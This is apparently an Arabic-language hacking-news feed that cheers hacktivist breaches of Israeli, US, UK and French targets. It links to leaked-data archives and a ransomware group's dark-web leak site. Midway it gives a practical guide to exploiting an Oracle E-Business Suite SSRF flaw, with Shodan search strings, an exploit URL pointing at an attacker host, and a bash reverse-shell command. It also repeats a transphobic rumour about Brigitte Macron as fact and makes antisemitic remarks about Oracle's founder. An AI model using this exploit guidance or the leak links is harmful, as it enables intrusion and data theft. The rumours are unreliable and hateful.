Hacker News

مجموعة حنظلة تكشف بيانات وصور كبار العلماء والمهندسين في معهد وايزمان

لا سبيل للتخفي بعد الآن

#HackerNews #HandalaHack

عاجل : اختراق حسابات قناة i24NEWS الصـهيونية على X فيسبوك ويوتيوب #HackerNews #الجزيرة

الوصول لأنظمة الدفاع الجوي الصهـيونية "الشعاع الحديدي" #HackerNews #CyberIsnaadFront

تمكنت مجموعة الهاكرز "جبهة الإسناد السيبراني" من الوصول لملفات ووثائق ومخططات بالغة الأهمية تخص منظومة الدفاع الجوي الليزري Iron beam «الشعاع الحديدي» ووعدد من المشاريع العسكرية الأخرى من بينها الطائرة المسيّرة متعددة المهام "هرمز 900"، وصاروخ "سبايك"، ومشاريع عسكرية قيد التطوير.

الشعاع الحديدي هو نظام دفاع جوي بالليزر الموجه طورته شركة رافائيل وتم الكشف عنه في 11 فبراير 2014.ودخل الخدمة في الجيش الصهـيوني في 17 أغسطس 2020.صمم لتدمير الصواريخ قصيرة المدى والقذائف.

نشرت المجموعة عدداً من الوثائق والصور قالت إنها حصلت عليها من خوادم تابعة لشركات صهيـونية عاملة في قطاع الدفاع، بينها شركة «مايا» المتخصصة في الصناعات العسكرية. كما تضمّنت الملفات المسربة صوراً لعقود موقعة بين الجيش الصهيـوني وعدد من الجهات الدفاعية في أستراليا ودول أوروبية، ما يبن مدى اختراق البنية التحتية الدفاعية الصهيـونية. تعد "MAYA" مسؤولة عن الأبحاث والتطوير لصالح شركات كبرى مثل "إلبيت سيستمز" و"رافائيل"، الذراعين الصناعي والتقني لوزارة الدفاع الصهـيونية. #HackerNews #CyberIsnaadFront

قام هاكر باختراق البوابة الضريبية الرسمية الفرنسية والدخول للملف الضريبي لزوجة الرئيس الفرنسي وتغيير اسم وجنس بريجيت ماكرون، حيث وضع في مكان الاسم "جان ميشيل ماكرون" والجنس "ذكر" ، وقال المستشار الخاص للرئيس الفرنسي تريستان بوم: دخلت السيدة ماكرون إلى حسابها الشخصي على موقع الضرائب فوجدت أن اسمها ليس بريجيت ماكرون، بل جان ميشيل ماكرون. وأضاف مستشار الرئيس: تم التحقيق في مخاوف من وجود خلل برمجي، ولكن سرعان ما تبين أنه نتيجة تدخل متعمد، وأضاف أنه من المستحيل تغيير القسم الذي تم تعديله دون إذن المستخدم. وأفاد المسؤول الحكومي أن فريقًا من القراصنة "القساة" منح بريجيت ماكرون اسمًا ذكريًا على البوابة الضريبية الفرنسية الرسمية.

وأثار جنس بريجيت الكثير من الجدل حيث يرى الكثيرين أن السيدة الأولى الفرنسية ولدت ذكرًا وفقًا للكثير من التقارير حيث كانت تحمل الاسم "جان ميشيل ترونيو" Jean Michel Trogneux وقامت بتغيير جنسها واسمها.

#HackerNews

حيث عثر على سجلات وصول، وأخذ بيانات اعتماد مستخدم إداري سابق. الحساب الذي اختاره كان لمدير سابق لمستشفى سجن "ديج" والذي كان يتمتع بصلاحيات إدارية كاملة لتطبيق إدارة السجون. حيث بدأ بتعديل حسابه المالي وحسابات 15 من أصدقائه السجناء. وحذف النفقات السابقة، وتعديل ملاحظات حسن السلوك للاستفادة من الإفراج المبكر. السجين بالغ كثيرا في تعديل حسابه المالي حيث كان ينفق مايعادل 2300 دولار شهريا، وهو مبلغ باهظ بالنسبة لشخص مسجون، حيث يبلغ ما يقرب من ثلاثة أضعاف الحد الأدنى للأجور في رومانيا، أما أحد أصدقائه فقد وصل حسابه لـ 1.15 مليون دولار. ليقوم بنك CEC بدق جرس الانذار بعد ملاحظة المخالفات بين الأموال التي دخلت النظام والإجمالي الحالي والمبالغ المنفقة، ويبدأ التحقيق بعد فترة وجيزة، لتكتشفت السلطات عمليات الاختراق في بداية شهر أكتوبر لتنزع كامل الأجهزة اللوحية مؤقتًا، ويتبين أن عمليات اختراق طالت كذلك مجمعين آخرين للسجون في البلاد. وذكرت وسائل إعلام رومانية أن أحد السجناء متهم بقضايا تتعلق بتكنولوجيا المعلومات قدم نفسه كعضو سابق في أنونيموس، كان وراء اكتشاف الخلل في نظام إدارة السجون وأخبر السجين "Aurel Z" بطريقة التلاعب والوصول لصلاحيات داخل المنصة، كما قدم معلومات عن طرق أخرى لاختراق تطبيق إدارة السجون مقابل تخفيف العقوبة. #HackerNews

في سابقة هي الأولى من نوعها تمكن أحد السجناء في رومانيا من اختراق منصة إدارة السجون في البلاد ليقوم بتخفيف عقوبته والاستفادة من مزايا متعددة له ولأصدقائه. وبحسب تقارير مختلفة في وسائل الإعلام الرومانية وبيان صادر عن اتحاد شرطة السجون الرومانية، وجد السجين "Aurel Z" طريقة لاختراق منصة إلكترونية تديرها الجمعية الوطنية للسجون عبر الأجهزة اللوحية المثبتة في مستشفى تابع لسجن مدينة "ديج" في منطقة ترانسيلفانيا، حيث يتم إرسال السجناء للعلاج ثم العودة لإكمال عقوبتهم في السجن. المنصة الإلكترونية تمكن السجناء عبر حساباتهم من تقديم طلبات، وتخفيض أيام من عقوبتهم بأداء وظائف مختلفة، أو إيداع أموال في حساب مصرفي يمكنهم استخدامها لاحقًا لشراء سلع وخدمات معينة. اكتشف السجين "Aurel Z" أنه بعد تسجيل الدخول إلى حسابه، كان بإمكانه تنفيذ إيماءات محددة على الجهاز اللوحي أو إساءة استخدام قائمة ابدأ ومنطقة الإشعارات لإرسال التطبيق المخصص للمساجين للخلفية والوصول إلى تطبيقات أخرى تعمل على الجهاز، وكان أحد هذه التطبيقات عبارة عن صفحة متصفح تحتوي على عناصر أخرى مشتركة على نفس الشبكة. #HackerNews

الرابط الأول : https://drive.proton.me/urls/XSFSE8B730#ir1WOXBtj2wb الرابط 2: https://drive.proton.me/urls/C0R8Y7ZE5R#slGOlxY1lLw8

ISRAEL EXPOSED إطلاق قاعدة بيانات بـ 920 جيجا لتوثيق جرائم حرب الاحتلال في غزة #HackerNews #ISRAELEXPOSED

تفاصيل الثغرة النظام المتأثر: Oracle E-Business Suite (الإصدارات من 12.2.3 حتى 12.2.14). المكون المستهدف: Oracle Configurator، نقطة النهاية /OA_HTML/configurator/UiServlet. نوع الثغرة: Server-Side Request Forgery (SSRF) – أي أن التطبيق يسمح للمهاجم بجعل الخادم يرسل طلبات لشبكة داخلية أو خدمات خارجية عبر معلمة الطلب (return_url). كيف يستطيع المهاجم الوصول إلى Oracle E-Business Suite أو العثور عليه؟ كشف الأنظمة المكشوفة عبر الإنترنت: يستخدم المهاجم محركات بحث مثل Shodan أو Censys برموز وتصنيفات مثل http.title:"Oracle E-Business Suite" أو كشف صفحات الويب باسم "OA_HTML" أو "Self Service". أحيانًا يكفي البحث عن عناوين مثل:

text
/OA_HTML
/OA_HTML/RF.jsp
/OA_HTML/AppsLocalLogin.jsp

فحص البورتات الشائعة: غالبًا ما تُنشر صفحات تسجيل الدخول EBS على منافذ 8000 و 8001 و 8080 و 4443 و 1521 وغيرها. استغلال إفصاحات النظام (Error Messages, Banners): قد تعرض صفحة الدخول أو الأخطاء تفاصيل عن الإصدار أو اسم التطبيق (Oracle Applications/Oracle E-Business Suite). الفهارس والتسريبات: قد تظهر عناوين الأنظمة المكشوفة من خلال فهارس البحث أو تسريبات بيانات الشركات. محاولة الوصول عبر كلمات مرور افتراضية: بعض المؤسسات تُبقي حسابات/خدمات بصلاحيات افتراضية دون تغيير كلمات المرور الأصلية. طريقة الاستغلال: يكفي إرسال طلب HTTP إلى الرابط vulnerable يضم رابطًا خبيثًا في حقل return_url مثل:

text
/OA_HTML/configurator/UiServlet?return_url=http://attacker.com/evil

فيقوم النظام بتنفيذ الطلب وإرجاع البيانات أو تنفيذ كود خبيث أحيانًا إذا تم دمج الثغرة مع طرق حقن أخرى. النتيجة عند الاستغلال: الوصول غير المصرح إلى بيانات حساسة من النظام أو الشبكة الداخلية. في بعض السيناريوهات، يمكن توسعة الهجوم ليصبح تنفيذ أوامر عن بعد (RCE) من خلال حقن قوالب XSL أو هجمات CRLF. ملخص عملي للسلوك التقني: المهاجم يرسل رابط طلب HTTP مثل:

text
GET /OA_HTML/configurator/UiServlet?return_url=http://malicious-site.com/payload

فيستجيب الخادم ويُنفذ الطلب، ما يسمح للمهاجم بتنفيذ هجمات داخلية أو تزوير مصادر البيانات أو الحصول على بيانات سرية. في بعض الحالات يقوم المهاجم بدمج SSRF مع حقن قوالب XSL أو هجمات CRLF، فيصبح بإمكانه رفع web shell أو تنفيذ reverse shell عبر أوامر مثل:

text
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

#HackerNews #Oracle #CVE_2025_61884

ثغرة CVE-2025-61884 هي ثغرة أمنية خطيرة تؤثر على منتج Oracle E-Business Suite، وتحديدًا مكون Oracle Configurator، وتسمح لأي مهاجم غير مُصادق له عبر الشبكة (HTTP) بتنفيذ هجمات تزوير الطلب من جانب الخادم SSRF للوصول للأنظمة الداخلية وسرقة بيانات حساسة. نظام Oracle E-Business Suite (غالبًا يُختصر EBS أو E-Biz) هو نظام متكامل لإدارة موارد المؤسسات (ERP) طورته شركة أوراكل. يوفّر حلولًا شاملة لإدارة المحاسبة، المخزون، الموارد البشرية، سلسلة التوريد، الشراء، المبيعات، عمليات المصانع، وغيرها من العمليات التجارية والإدارية في المؤسسات المتوسطة والكبرى. #HackerNews #Oracle #CVE_2025_61884

لاري إليسون مؤسس ومدير أوراكل يهودي الديانة صهيـوني المذهب مجهول الأب، تركته والدته وهو صغير وتبنته عمة والدته، يعتبر الآن ثاني أغنى رجل في العالم، لاري إليسون معروف بدعمه القوي للكيان الصهـيوني وبعلاقته القوية مع بنيامين نتنياهو، بعد أحداث 7 أكتوبر 2023، أعلنت أوراكل دعمها الصريح للكيان الصهـيوني. وقد قامت بتمويل حملات علاقات عامة لمساندة الكيان المحتل على منصات التواصل الاجتماعي، كما قدمت تبرعات لمنظمات صهيونـية مثل "ماجن دافيد أدوم". بالإضافة إلى ذلك، تعاونت أوراكل مع وحدات عسكرية صهيونـية، بما في ذلك وحدة 81 الاستخباراتية وسلاح الجو الصهيونـي، في مشاريع تكنولوجية مختلفة. يخطط لاري إليسون رفقة الحكومة الصهـيونية لمرحلة ما بعد الحرب على غزة، من جهة عبر تقديم صديقه توني بلير كمرشح لإدارة غزة. وكذلك تحويل غزة إلى منطقة تجارة حرة تحت سيطرة تكنولوجية عالية، مع استخدام نظام مراقبة وهويات رقمية وشرائح إلكترونية مدمجة تحت الجلد لجمع وإرسال البيانات. حيث لا يمكن وصف هذه المخططات سوى بأنها استغلال تكنولوجي للاستعمار الحديث والعبودية الرقمية، حيث يمكن أن تُدار غزة بتقنيات المراقبة والذكاء الاصطناعي، قبل أن تعمم على بقية حكومات العالم كحلول مجدية للسيطرة على العنف والمراقبة المستمرة لأي سلوك إجرامي.

كلمة أوراكل مشتقة من الكلمة اللاتينية oraculum وتعني "العرافة" التي تمتلك المعرفة ولديها إطّلاع على الأمور الغيبية.

#HackerNews #DigitalID #الهويةـالرقمية #العبوديةـالرقمية

شركة أوراكل (Oracle Corporation) عملاق تكنولوجي أمريكي متعدد الجنسيات وواحدة من أضخم وأهم شركات تقنية المعلومات وقواعد البيانات في العالم. تأسست شركة أوراكل في العام 1977 على يد اليهودي "لاري اليسون"، تقدم الشركة منتجات وخدمات لمختلف الشركات والحكومات في العالم. توفر بالأساس الخدمات السحابية (Oracle Cloud) ونظام إدارة قواعد البيانات وتطبيقات الأعمال مثل Oracle E-Business Suite، وOracle PeopleSoft، وOracle JD Edwards، تُستخدم منتجاتها في مجموعة واسعة من الصناعات، بما في ذلك الخدمات المالية ،الرعاية الصحية ،التصنيع ،الاتصالات والقطاع الحكومي. #HackerNews #DigitalID #الهويةـالرقمية #العبوديةـالرقمية

موقع مجموعة Lynx على الدارك ويب (احذف النجوم *) : http://*lynxblogco7r37jt7p5wrmfxzqze7ghxw6rihzkqc455qluacwotciyd*.onion/leaks

نشرت مجموعة قرصنة روسية ملفات تحتوي على تفاصيل ثماني قواعد عسكرية تابعة لسلاحي الجو الملكي البريطاني والبحرية، بالإضافة إلى أسماء ورسائل البريد الإلكتروني لموظفي وزارة الدفاع. كشفت البيانات المسربة المتداولة على الدارك ويب، معلومات عن قواعد سلاح الجو الملكي البريطاني والبحرية، مثل قاعدة لاكنهيث الجوية في سوفولك التي تستقبل طائرات الشبح إف-35 التابعة للقوات الأمريكية وقنابل نووية، البيانات المسربة تضمنت كذلك ملفات تخص قاعدة الرادار السرية للغاية RAF Portreath ومركز الطائرات بدون طيار في المملكة المتحدة RAF Predannack.

وذكرت مجموعة القرصنة الروسية Lynx أنها تمكنت من الوصول إلى ذاكرة التخزين المؤقت لملفات بحجم 4 تيرابايت عن طريق اختراق شركة المقاولات والصيانة والبناء Dodd Group المتعاقدة مع وزارة الدفاع، وقالت الشركة إن هجومًا إلكترونيًا أدى إلى الوصول إلى أنظمتها الداخلية.

وصرح الكولونيل "فيل إنغرام" لصحيفة ذا صن البريطانية أن هجومًا بهذا الحجم سيُثير قلقا بالغا في الولايات المتحدة، وتابع: «أي معلومات حساسة، بدءاً من رسائل البريد الإلكتروني وحتى أرقام الهواتف المحمولة، ستكون مفيدة لأعدائنا». #HackerNews

ردًا على استيلاء مكتب التحقيقات الفيدرالي FBI على منتدى التسريبات BreachForums ، قامت مجموعة Scattered Lapsus$ Hunters بنشر معلومات سرية تخص مئات المسؤولين الحكوميين الأميركيين في مكتب التحقيقات الفيدرالي، ودائرة الهجرة والجمارك، ووزارة العدل الأمريكية. نشر المخترقون بالفعل جداول بيانات تعود لـ 680 مسؤولًا في وزارة الأمن الداخلي، و170 عميلًا في مكتب التحقيقات الفيدرالي، و190 مسؤولًا في وزارة العدل. وتتضمن المعلومات المسربة عناوين البريد الإلكتروني الحكومية، والأسماء الشخصية، وأرقام الهواتف، وعناوين السكن، وفقًا لموقع 404 Media. وقالت مجموعة Scattered Lapsus$ Hunters عبر رسالة مفادها أنها ستوقف نشاطها مؤقتًا لمراجعة أمنها التشغيلي، والعودة للعمل بعد مدة وعزمها على "إغلاق جميع البنى التحتية الحيوية للولايات المتحدة" و"إغلاق جميع المطارات حول العالم". كما ألمحت المجموعة إلى أنها ستشن حملات تدميرية واسعة النطاق خلال الفترة المقبلة، مشيرةً إلى أن "عام 2026 سيكون عامًا كارثيًا". #HackerNews #Scattered #Lapsus #Hunters

عاجل : اختراق أنظمة أربعة مطارات في أمريكا وكندا وبث رسائل مؤيدة لفلـسطين #HackerNews

عقب العملية التي أثارت القلق في المطارات، قال وزير النقل الأمريكي "شون دافي" عبر مواقع التواصل الاجتماعي : "هذا أمر غير مقبول إطلاقًا، وهو أمر مفهوم، وقد أثار ذعر المسافرين". وأضاف أنه يعمل مع إدارة الطيران الفيدرالية ومطار هاريسبرج للتحقيق في الأمر. وقالت وزارة النقل الكندية، التي تملك وتدير المطارات في كندا: "إنها تحقق في الهجمات على مطاراتها وتعمل مع جهات إنفاذ القانون لضمان عدم وجود أي تأثيرات على سلامة وأمن عمليات المطار". #HackerNews

في عملية نوعية استهدفت أكبر المطارات في أمريكا الشمالية، تعرضت أنظمة أربعة مطارات في أمريكا وكندا لعملية اختراق إلكتروني استهدف أجهزة البث الصوتي وشاشات العرض داخل قاعات الانتظار حيث تم بث رسائل تشيد بحركة حمـ.ـاس وتنتقد الرئيس ترامب. العملية نتج عنها اختراق أنظمة مطار هاريسبرج الدولي في بنسلفانيا، ومطار وندسور الدولي في أونتاريو، ومطار كيلونا الدولي ومطار فيكتوريا الدولي في كولومبيا البريطانية، وتم نشر مقطع فيديو على شاشات المطارات لإمرأة تقول: "حرروا فلسطين" وتنتقد كل من الرئيس الأمريكي ترامب ورئيس الوزراء الصهـيوني بنيامين نتنياهو. مع كتابة عبارات: "سايبر الإسلام كان هنا"، وأيضا ""خسرت إسرا*ئيل الحرب، وفازت حمـ.ـاس بشرف". #HackerNews

اختراق كامل أنظمة Merkaz HaGaz شركة الغاز الوطنية الصهـيونية بواسطة مجموعة الهاكرز أطفال غـزة #HackerNews #Gaza_Children_Hackers #CyberIsnaadFront